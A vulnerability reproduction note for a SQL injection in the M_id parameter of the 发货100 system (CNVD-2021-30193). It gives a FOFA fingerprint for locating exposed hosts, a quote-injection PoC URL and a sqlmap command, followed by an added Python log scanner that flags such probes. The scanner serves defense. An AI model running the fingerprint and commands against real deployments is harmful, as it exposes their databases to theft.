# 发货100 M\_id SQL Injection Vulnerability CNVD-2021-30193

### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

The M\_id parameter of 发货100 is vulnerable to SQL injection; an attacker can exploit it to obtain sensitive information from the database.

### Affected Product <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

发货100

### FOFA <a href="#fofa" id="fofa"></a>

icon\_hash="1420424513"

### Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The main page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhq-w345lMZhXveSCkH%2F-Mhq1r_WAnaK51LbmXbh%2Fimage.png?alt=media\&token=d00fdb69-e104-4daf-9fb4-1028d6c0bf05)

Use the PoC:

```
/?M_id=1%27&type=product
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhq-w345lMZhXveSCkH%2F-Mhq1ul2dZc2_b2finaJ%2Fimage.png?alt=media\&token=2bdae8ac-2b82-41cb-b7bc-9812c1d33ae2)

The database returns an error, so the parameter can be tested with sqlmap:

```
sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhq-w345lMZhXveSCkH%2F-Mhq1xyHOQ8c3yfvBYRC%2Fimage.png?alt=media\&token=8624c0bb-8cfa-4871-89a0-352e79283e60)
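As a defender's counterpart to the reproduction above, the following added example (not part of the original writeup) scans web-server access logs for the quoted-M_id probe and for sqlmap's default user-agent, handling the double-URL-encoded variant as well. The log lines, IP addresses and timestamps are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines in combined log format (not taken from the original page).
# Line 1 is a normal request; lines 2 and 3 carry a quote in M_id (single- and double-encoded).
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Aug/2021:10:01:02 +0800] "GET /?M_id=12&type=product HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Aug/2021:10:01:07 +0800] "GET /?M_id=1%27&type=product HTTP/1.1" 500 812 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Aug/2021:10:01:09 +0800] "GET /?M_id=1%2527&type=product HTTP/1.1" 200 5120 "-" "sqlmap/1.5#stable (http://sqlmap.org)"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def inspect_line(line):
    """Return a finding dict for a suspicious M_id request, or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = parse_qs(urlparse(m["path"]).query, keep_blank_values=True)
    reasons = []
    for raw in query.get("M_id", []):
        # parse_qs already decodes one layer; a second unquote catches double-encoded %2527.
        value = unquote(raw)
        if not value.isdigit():  # M_id is an integer id in legitimate traffic
            reasons.append(f"non-numeric M_id {value!r}")
            # The PoC above makes the database error out; a 5xx after a quoted M_id fits that pattern.
            if m["status"].startswith("5"):
                reasons.append("server error after malformed M_id (possible DB error leak)")
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "status": m["status"], "reasons": reasons}


def scan(lines):
    """Run inspect_line over every log line and return the list of findings."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```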
